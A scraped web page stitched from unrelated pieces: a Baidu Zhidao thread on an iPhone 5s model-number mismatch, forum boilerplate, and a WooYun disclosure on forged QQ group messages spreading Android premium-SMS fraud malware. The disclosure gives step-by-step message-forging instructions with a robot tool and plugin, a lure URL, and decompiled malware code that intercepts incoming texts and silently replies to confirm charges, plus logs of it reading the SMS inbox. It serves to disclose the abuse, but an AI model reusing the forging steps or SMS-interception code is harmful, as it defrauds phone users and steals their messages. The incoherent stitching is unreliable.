这里面有个QQ1453..4那个 后面的1453qq空间水晶序列号号是登陆过此计算机的qq号吗?

我的5s手机背面是A1453但是在手机设置里型号后面是CH 也就是国行 我的包装盒上的是A1530_百度知道
我的5s手机背面是A1453但是在手机设置里型号后面是CH 也就是国行 我的包装盒上的是A1530
今天去移动办理4G业务 说我的手机不支持 。搞什么东西啊我的5s手机背面是A1453但是在手机设置里型号后面是CH 也就是国行 我的包装盒上的是A1530。在网上查A1453只支持2G 但我上网显示的是3G。在线等 挺急的
提问者采纳
你的有可能是日本版的后配的国行的盒子?,日版按照官方数据是不支持移动3G和4G的。
我的可以支持3G
国行iPhone5S有四个版本,分别是公开版本、移动版本、联通版本和电信版本。其型号分别是A28/A33。其中区别的是网络制式的不同,由于后面的三个版本是运营商的定制版本,所以在频段上是有一定的阉割的。A1530公开版本支持:联通2G/移动2G/联通3G/移动3G/移动4G;而移动定制的版本支持移动2G/3G/4G和联通2G,在国外漫游解锁WCDMA;而联通的版本支持联通2G/3G和移动2G网络,电信版本就只有电信2G/3G,在国外漫游时支持WCDMA网络。
如果你的手机型号与包装盒上不同,那你的手机就有问题了,因为a1453没有国行,只有日本版和美国s版
希望这个网页可以帮到你
苹果手机水太深了,只有在直营店和正规营业厅购买才有保障,华强北的奸商太厉害了。
提问者评价
太给力了,你的回答完美的解决了我的问题!
其他类似问题
为您推荐:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁南汇52生活网论坛|浦东社区生活论坛 -
Powered by Discuz!
后使用快捷导航没有帐号?
只需一步,快速开始
扫一扫,访问微社区
随时随地,快速访问
只要手机在手,您都可以快速、方便地看贴发帖,与论坛好友收发短消息。
极致优化,畅快"悦"读
独有的论坛界面和触屏设计,手机论坛也变得赏心悦目,操作自如。
即拍即发,分享生活
不管是风景图画,还是新闻现场,拍照发帖一气呵成,让您在论坛出尽风头。
下载客户端后,拍摄二维码快速访问本站:
或者通过以下地址访问:
Powered by我的5s手机背面是A1453但是在手机设置里型号后面是CH 也就是国行 我的包装盒上的是A1530_百度知道
我的5s手机背面是A1453但是在手机设置里型号后面是CH 也就是国行 我的包装盒上的是A1530
jpg" esrc="/zhidao/pic/item/ddde711fefce1b9d16616a.baidu://f://f。搞什么东西啊.jpg" />&nbsp.jpg" target="_blank" title="点击查看大图" class="ikqb_img_alink"><img class="ikqb_img" src="http.挺急的<a href="http。在线等&也就是国行&/zhidao/wh%3D600%2C800/sign=252daab2f03/377adab44aed2e01a18b87d6fa77.jpg" esrc="说我的手机不支持&nbsp.baidu.hiphotos。在网上查A1453只支持2G&nbsp://g..com/zhidao/pic/item/377adab44aed2e01a18b87d6fa77.baidu://g.com/zhidao/wh%3D450%2C600/sign=9a6fb207d588d43ff0fc99f6482efe2d/ddde711fefce1b9d16616a;
来自团队:
其他类似问题
为您推荐:
其他3条回答
在哪买的赶紧回去换
便宜是有道理的
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
QQ消息伪造被短信吸费/推广马利用大范围传播
详细说明:
攻击者在 qq 群通过伪造系统消息,利用诱导性文字引用用户点击并且下载后门木马
http://mmlogdgw.ckmnjvk.bbsj.pw/view/2/?id=29,0.0736658
根据网上的资料,具体实现方法:
1、需要MyPCQQ这个机器人软件(地址http://**.**.**.**/)
2、打开MyPCQQ,登录你的小号,插件栏点添加插件(插件见本文底部下载)
3、选择附件中的Xml_test.xx.dll,安装,然后启用!
4、给你的小号发消息:#000000 内容
(比如:#000000 啊啊额)如图:
5、把代码的“内容”改成你想要的文字即可!
6、可以让小号发给你然后转发给别人!
网站会根据 UA 提示用户下载不同类型的木马
共两个样本文件
MD5分别为:
IFoxInstall-y-c-s-run-ng-nti-x.exe
D68DBFBA31B
yy_101_1_tt.exe
7A3F4B848C311EBD4CC83BEACFCD03B0
其中IFoxInstall-y-c-s-run-ng-nti-x.exe是搜狐影音静默安装包,有合法数字签名,属于搜狐公司。
样本行:为静默安装搜狐影音并打开。
yy_101_1_tt.exe为经过修改的天天动听独立运行版本。存在数字签名,但证书并非天天动听所属公司,下图最左为官方安装包数字签名,右侧为修改后的程序数字签名。经验证,签名证书为合法证书,可能是私钥被盗或者到期后私钥被随意处置。
样本行为:后台启动天天动听进程,连接接网页版天天动听(**.**.**.** )并关闭窗口,最小化至托盘图标,删除IE代理设置。无其他明显恶意行为。
漏洞证明:
给 android 下发的短信吸费木马
apparr[0]=&http://**.**.**.**/&;
apparr[1]=&http://**.**.**.**/KB1106&;
这图标看着还有点小激动了
这木马还是挺良心..至少提供的几张图片可以点,虽然点进入都是 youku 的视频,但是好歹不像短信拦截马直接一个空白的 activity 然后 disable 掉.
app 启动后先简单用户机型/imei/坐标等信息回传服务器,然后开始进行短信吸费.这种用系统 api 在后台发送短信用户是很难感知到的.好在android 6.0后是方法调用触发权限分配.
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ Send SMS -&
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ SMS DestNumber:12114
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ SMS Content:苏州易N支付#912#763
当然测试机没有 sim 卡,支付失败
还有获取用户短信记录等恶意操作
code 区域Invoke android.content.ContentResolver-&query
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ content://sms/inbox
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ Read ContentProvider -& Uri = content://sms/inbox
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ Query SQL = select service_center from [content://sms/inbox]
order by date desc
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ Invoke android.content.ContentResolver-&registerContentObserver
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ content://sms/
lkabphl.aiafcng.djchmco.bfmdkib.aldpkpl.mihgmce﹕ Register ContentProvider Change -& Uri = content://sms/
实时拦截短信 ,并且可以远程控制用户发送任意短信,达到吸费目的 (直接对吸费短信回复确认,用户无感知)
code 区域&receiver android:name=&xae.dd.RE&&
&intent-filter android:priority=&1000&&
&action android:name=&android.provider.Telephony.SMS_RECEIVED& /&
&category android:name=&android.intent.category.DEFAULT& /&
&/intent-filter&
&/receiver&
code 区域public class RE extends BroadcastReceiver {
private AX arrayS
public RE() {
public void ArSms(String sender, String content) {
String v2 =
String[] v6 = content.split(&,&);
for(v7 = 0; v7 & v6. ++v7) {
for(v8 = 0; v8 & this.arraySms.arSms. ++v8) {
if(v6[v7].contains(this.arraySms.arSms[v8])) {
String v3 = this.arraySms.getNumbers(v6[v7]);
switch(v8) {
v3 = URLDecoder.decode(&%CA%C7&);
v3 = URLDecoder.decode(&%C8%B7%B6%A8&);
v3 = URLDecoder.decode(&%CA%C7&);
v3 = &VIP&;
v3 = URLDecoder.decode(&%CA%C7&);
v3 = v3.replace(&1/2&, &&);
v3 = v3.substring(1, v3.length());
case 10: {
v3 = URLDecoder.decode(&%CA%C7&);
case 11: {
v3 = URLDecoder.decode(&%B7%C9%BB%FA&);
case 14: {
case 15: {
v3 = URLDecoder.decode(&%CA%C7&);
case 16: {
v3 = &是&;
SmsManager.getDefault().sendTextMessage(sender, v2, v3, ((PendingIntent)v2), ((PendingIntent)
另一个apk也大同小异,不过还加入了一些 app 推广
居然还有360的推广..
之后还有子包释放
发送吸费短信
code 区域com.taobao.play.v﹕ Invoke android.telephony.SmsManager-&sendTextMessage
com.taobao.play.v﹕ Send SMS -&
com.taobao.play.v﹕ SMS DestNumber:12114
com.taobao.play.v﹕ SMS Content:BJJS#763
然后子包还好不断释放子包.全局 toast 让你点击安装.然后他们就跟葫芦娃一样互帮互助..你不一口气全杀掉他们就又会重新出现.持续让你羞羞哒.吸干你的话费.
修复方案:
版权声明:转载请注明来源 @
厂商回应:
危害等级:无影响厂商忽略
忽略时间: 16:29
厂商回复:
所述软件未能确认相关管理方,同时暂不属于官方维护产品。未列入处置流程。
漏洞Rank:10
(WooYun评价)
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
又将是一波灰色的网赚思路。
这思路真淫荡。。说得 哦好像能看见详情一样
不就是这个么/widget/shareqq/index.html?url=/?_wv=/widget/shareqq/index.html?url=/?_wv=1027&k=YOzK2k&desc=&title=&+ 标题+“&summary=”+内容+“&pics=/gh/?t=&site=”+标签+“&style=201&width=32&height=32”
早就玩烂了
大哥你是不是挂黑链 啊
你是社工库
登录后才能发表评论,请先

我要回帖

更多关于 6s后面没有序列号 的文章

 

随机推荐